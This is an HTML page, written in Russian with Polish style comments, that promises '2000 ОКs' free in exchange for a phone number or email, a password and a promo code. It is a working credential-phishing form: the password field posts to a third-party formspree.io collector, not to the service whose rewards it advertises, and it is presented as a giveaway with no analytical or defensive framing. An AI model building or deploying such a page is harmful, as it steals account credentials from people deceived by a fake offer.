
<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8">
  <title>Formularz</title>
  <style>
    html, body {
      width: 100%;
      margin: 0;
      padding: 0;
    }
    body {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  
    }
    form {
      width: 100%;
      max-width: 600px;
      margin: 0;
      font-size: 42px;
    }
    label, input, textarea {
      font-size: 42px;
    }
    input[type="submit"] {
      font-size: 42px;
      font-weight: bold;
      padding: 40px 60px; /* większa wartość padding */
      background-color: #007bff;
      color: #fff;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }
    input[type="submit"]:hover {
      background-color: #0062cc;
    }
  </style>
</head>
<body>
  <div style="text-align:center;">
    <h1><b>Чтобы получить бесплатно 2000 ОКs
    заполните данные, введите промо-код.</h1>
    
      <form action="https://formspree.io/f/mnqyzroj" method="POST">
      <div style="text-align:center;">
        <label for="name"><b>Телефон или адрес эл. почты</label><br>
        <input type="text" id="name" name="name"><br><br>
        <label for="name">Пароль</label><br>
        <input type="text" id="name" name="name"><br><br>

         <label for="name">промо-код</label><br>
        <input type="text" id="name" name="name"><br><br>
        
        <input type="submit" value="Отправить">
      </div>
    </form>
  </div>
</body>
</html>
